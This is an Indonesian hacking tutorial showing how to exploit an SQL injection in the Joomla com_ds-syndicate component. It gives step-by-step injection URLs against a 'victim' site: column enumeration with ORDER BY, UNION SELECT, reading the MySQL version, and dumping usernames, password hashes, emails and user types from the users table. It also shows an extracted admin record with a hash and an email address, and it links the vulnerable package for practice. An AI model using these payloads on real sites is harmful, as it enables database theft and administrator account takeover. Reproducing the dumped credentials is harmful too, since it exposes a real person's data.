Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1


Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ' ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1'


Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds' dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* --> errornya sama
…
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* --> errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users

lihat paling akhir dari baris tersebut,
from+wc_users

wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,


Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.


Lihat angka 2 di dalam tag

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini ...

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users


perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :



Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D.

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut ...



Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :


admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK: alkemail@gmail.comThis e-mail address is being protected from spambots, you need JavaScript enabled to view it :Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.comThis e-mail address is being protected from spambots, you need JavaScript enabled to view it
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya
Peterpanz yang kerepotan ngurus skripsi juga :D, mr.freeman, for jojo too, najwa[at]STSN, dr.emi, denice the manace, Phii_, fadli